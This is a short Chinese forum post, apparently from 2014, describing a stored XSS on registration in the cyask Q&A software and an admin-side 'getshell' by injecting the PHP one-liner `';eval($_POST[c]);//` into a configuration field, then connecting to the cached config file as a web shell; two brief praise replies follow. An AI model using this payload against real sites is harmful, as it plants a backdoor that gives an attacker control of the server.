cyask 前台xss与后台Getshell

Diana · 发表于 2014-2-28 04:47:19

首先是注册一枚

xss" width="614" height="390" style="border: 0px;" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>
然后查看会员资料，发现xss已经成功的触发了

xss2" width="984" height="241" style="border: 0px;" onload="return imgzoom(this,550);" onclick="javascript:window.open(this.src);" style="cursor:pointer;"/>

关于后台拿shell，在配置文件出插入
?
1
';eval($_POST[c]);//
经过检查，只能插入四处

插入后连接
askdata\cache\cache_variable.php

Benq · 发表于 2014-2-28 11:25:51

厉害阿！！！！！！！！！！！！！！顶一个

夜尽天明 · 发表于 2014-3-1 11:19:42

楼主专注东东30年

cyask 前台xss与后台Getshell

相关帖子

指导单位

旗下站点

联系我们